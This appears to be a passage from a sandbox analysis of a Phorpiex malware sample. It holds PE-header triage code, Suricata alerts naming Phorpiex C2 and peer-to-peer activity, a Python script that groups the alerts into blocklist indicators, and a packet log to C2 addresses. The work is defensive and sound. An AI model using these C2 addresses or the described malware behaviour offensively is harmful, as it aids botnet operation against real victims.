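    print("imphash:", imphash(IMPORTS), "(matches report)" if imphash(IMPORTS) == REPORTED_IMPHASH else "(order differs from import directory)")
    print("entrypoint section:", section_of(ENTRYPOINT, SECTIONS))
    print("packing indicators:", packing_indicators(SECTIONS, ENTRYPOINT) or "none")
    print("capabilities:", capability_profile(IMPORTS))
```

For this sample every heuristic stays quiet (entropies between 0.35 and 5.63, raw sizes at or above virtual sizes, entrypoint in .text), which agrees with a 10 KB unpacked VS2008 binary whose behaviour is visible straight from the import table.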
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-28T18:18:28.772817+0100 | 2856563 | ETPRO MALWARE Phorpiex Domain in DNS Lookup | 1 | 192.168.2.10 | 55531 | 1.1.1.1 | 53 | UDP
2024-11-28T18:18:30.566440+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49702 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:33.724115+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49702 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:33.724115+0100 | 2853292 | ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin | 1 | 192.168.2.10 | 49702 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:41.727174+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49703 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:41.727174+0100 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.10 | 49703 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:43.482513+0100 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.10 | 55293 | 90.156.160.6 | 40500 | UDP
2024-11-28T18:18:44.488388+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49706 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:44.488388+0100 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.10 | 49706 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:48.533043+0100 | 2044077 | ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC | 1 | 192.168.2.10 | 55293 | 80.191.218.209 | 40500 | UDP
2024-11-28T18:18:48.794430+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49711 | 91.202.233.141 | 80 | TCP
2024-11-28T18:18:51.034709+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49712 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:51.034709+0100 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.10 | 49712 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:53.558980+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49713 | 185.215.113.66 | 80 | TCP
2024-11-28T18:18:53.558980+0100 | 2848295 | ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 | 1 | 192.168.2.10 | 49713 | 185.215.113.66 | 80 | TCP
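The alert table above mixes three things a responder should keep apart: the DNS-lookup alert, whose destination is the sandbox resolver 1.1.1.1 and not an indicator (the indicator would be the queried domain, which this page does not show); the generic "Common Downloader Header Pattern" alerts at severity 2, which on their own are low confidence; and the family-specific Phorpiex CnC check-in and UDP peer-to-peer alerts at severity 1. The following Python is an added example, not part of the Joe Sandbox report: it rolls the rows up per destination, counts distinct sessions, keeps the highest severity, and tiers each destination by the strongest signature seen. The rows are transcribed from the table above as constructed input; the tier labels are my own.

```python
# Suricata alert rows transcribed from the report table (constructed input for this example):
# timestamp, SID, signature, severity, src IP, src port, dst IP, dst port, proto.
ALERTS = [
    ("2024-11-28T18:18:28.772817+0100", 2856563, "ETPRO MALWARE Phorpiex Domain in DNS Lookup", 1, "192.168.2.10", 55531, "1.1.1.1", 53, "UDP"),
    ("2024-11-28T18:18:30.566440+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2, "192.168.2.10", 49702, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:33.724115+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2, "192.168.2.10", 49702, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:33.724115+0100", 2853292, "ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin", 1, "192.168.2.10", 49702, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:41.727174+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2, "192.168.2.10", 49703, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:41.727174+0100", 2848295, "ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3", 1, "192.168.2.10", 49703, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:43.482513+0100", 2044077, "ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC", 1, "192.168.2.10", 55293, "90.156.160.6", 40500, "UDP"),
    ("2024-11-28T18:18:44.488388+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2, "192.168.2.10", 49706, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:44.488388+0100", 2848295, "ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3", 1, "192.168.2.10", 49706, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:48.533043+0100", 2044077, "ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC", 1, "192.168.2.10", 55293, "80.191.218.209", 40500, "UDP"),
    ("2024-11-28T18:18:48.794430+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2, "192.168.2.10", 49711, "91.202.233.141", 80, "TCP"),
    ("2024-11-28T18:18:51.034709+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2, "192.168.2.10", 49712, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:51.034709+0100", 2848295, "ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3", 1, "192.168.2.10", 49712, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:53.558980+0100", 2803274, "ETPRO MALWARE Common Downloader Header Pattern UH", 2, "192.168.2.10", 49713, "185.215.113.66", 80, "TCP"),
    ("2024-11-28T18:18:53.558980+0100", 2848295, "ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3", 1, "192.168.2.10", 49713, "185.215.113.66", 80, "TCP"),
]


def is_resolver_alert(signature):
    """DNS-lookup signatures fire on the query packet, so its destination is the
    resolver (1.1.1.1 in this sandbox), never the C2. Do not blocklist that IP."""
    return "DNS Lookup" in signature


def tier(signatures):
    """Confidence tier from the strongest signature name (labels are this example's own)."""
    if any("Peer-to-Peer" in s for s in signatures):
        return "p2p-peer"
    if any("CnC" in s for s in signatures):
        return "c2"
    return "generic-downloader"  # header-pattern rule alone: corroborate before blocking


def summarize_destinations(alerts):
    """Roll alerts up per (dst IP, dst port, proto) with sessions, SIDs and top severity."""
    out = {}
    for ts, sid, sig, sev, src, sport, dst, dport, proto in alerts:
        if is_resolver_alert(sig):
            continue
        e = out.setdefault((dst, dport, proto), {
            "count": 0, "sessions": set(), "sids": set(), "signatures": set(),
            "max_severity": sev, "first_seen": ts, "last_seen": ts,
        })
        e["count"] += 1
        e["sessions"].add((src, sport))          # one TCP connection per source port
        e["sids"].add(sid)
        e["signatures"].add(sig)
        e["max_severity"] = min(e["max_severity"], sev)   # Suricata: 1 is the highest priority
        e["first_seen"] = min(e["first_seen"], ts)        # ISO timestamps sort lexically
        e["last_seen"] = max(e["last_seen"], ts)
    for e in out.values():
        e["tier"] = tier(e["signatures"])
    return out


def indicators(alerts):
    """One 'ip:port/proto' line per destination, for blocklist review."""
    summary = summarize_destinations(alerts)
    return sorted(
        f"{ip}:{port}/{proto} tier={e['tier']} severity={e['max_severity']} "
        f"alerts={e['count']} sessions={len(e['sessions'])} sids={sorted(e['sids'])}"
        for (ip, port, proto), e in summary.items()
    )


if __name__ == "__main__":
    for line in indicators(ALERTS):
        print(line)
```

Run on this table it yields four destinations: 185.215.113.66:80/TCP as the HTTP C2 (11 alerts across 5 connections, three distinct SIDs), 91.202.233.141:80/TCP seen only by the generic header rule, and the two UDP/40500 peers. The resolver never appears.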
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2024 18:18:29.095056057 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:29.216053009 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:29.216289043 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:29.216578007 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:29.336524010 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.566354036 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.566440105 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.566548109 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.566591024 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.568135977 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.568157911 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.568171978 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.568186998 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.568223000 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.568223000 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.569247961 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.569271088 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.569281101 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.569303989 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.569331884 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.570137978 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.570183039 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.570241928 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.570281029 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.687505960 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.687551022 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.687659979 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.687704086 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.691699982 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.691818953 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.702912092 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.702923059 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.703008890 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.760257959 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.760318995 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.760325909 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.760361910 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.764497995 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.764558077 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.764610052 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.764648914 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.773648977 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.773720026 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.773727894 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.773873091 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.781354904 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.781409025 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.781430006 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.781469107 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.789829969 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.789916992 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.789932013 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.789973021 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.798209906 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.798305988 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.798311949 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.798361063 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.806602001 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.806679964 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.806817055 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.806863070 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.814917088 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.815025091 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.815063953 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.815135002 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.823307991 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.823419094 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.823477030 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.823523998 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.831007004 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.831074953 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.831178904 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.831221104 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.838737011 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.838789940 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.938165903 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.938220024 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.938275099 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.938317060 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.941997051 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.942073107 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.952393055 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.952405930 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.952482939 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.954704046 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.954766035 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.954777002 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.954817057 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.959346056 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.959410906 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.959422112 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.959454060 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.963835001 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.963912964 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.963922024 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.963963985 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.968460083 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.968518019 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.968529940 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.968570948 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.973146915 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.973201036 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.973237038 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.973278999 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.977859974 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.977909088 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.977940083 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.977977991 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.982398033 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.982440948 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.982490063 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.982528925 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.987091064 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.987162113 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.987190962 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.987234116 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
Nov 28, 2024 18:18:30.991736889 CET | 80 | 49702 | 185.215.113.66 | 192.168.2.10
Nov 28, 2024 18:18:30.991801977 CET | 49702 | 80 | 192.168.2.10 | 185.215.113.66
                                                                  Nov 28, 2024 18:18:30.991894960 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.991935015 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.996454954 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.996512890 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:30.996561050 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:30.996601105 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.001029015 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.001082897 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.001173019 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.001219034 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.005687952 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.005733967 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.005785942 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.005824089 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.010337114 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.010397911 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.010448933 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.010490894 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.014952898 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.015002966 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.015054941 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.015091896 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.019623995 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.019699097 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.019736052 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.019785881 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:31.024234056 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:31.024293900 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:33.160669088 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:33.280755997 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:33.723968029 CET8049702185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:33.724114895 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:34.067478895 CET4970280192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:40.148210049 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:40.271528959 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:40.271619081 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:40.271831989 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:40.393220901 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.727097034 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.727135897 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.727174044 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.727205038 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.729139090 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.729176044 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.730559111 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.730573893 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.730588913 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.730639935 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.730684042 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.731241941 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731255054 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731268883 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731292963 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.731307030 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.731611013 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.731926918 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731964111 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.731972933 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.732004881 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:41.850075006 CET8049703185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:41.850142956 CET4970380192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:42.983342886 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:43.110472918 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:43.110611916 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:43.111243010 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:43.231192112 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:43.479971886 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:43.602015972 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:43.602137089 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:43.603981972 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:43.724108934 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:43.724273920 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:43.844238997 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:44.488215923 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.488320112 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.488388062 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.488388062 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.489069939 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489093065 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489104033 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489128113 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.489190102 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.489758968 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489820957 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489831924 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.489856005 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.489926100 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.490613937 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.490719080 CET8049706185.215.113.66192.168.2.10
                                                                  Nov 28, 2024 18:18:44.490750074 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:44.490778923 CET4970680192.168.2.10185.215.113.66
                                                                  Nov 28, 2024 18:18:45.689966917 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:45.742775917 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:45.935275078 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:45.977127075 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:46.073962927 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:46.194897890 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:46.194986105 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:46.319936991 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:46.918927908 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:46.961509943 CET4970840500192.168.2.10178.22.172.2
                                                                  Nov 28, 2024 18:18:47.121893883 CET4050049708178.22.172.2192.168.2.10
                                                                  Nov 28, 2024 18:18:47.165039062 CET4970840500192.168.2.10178.22.172.2
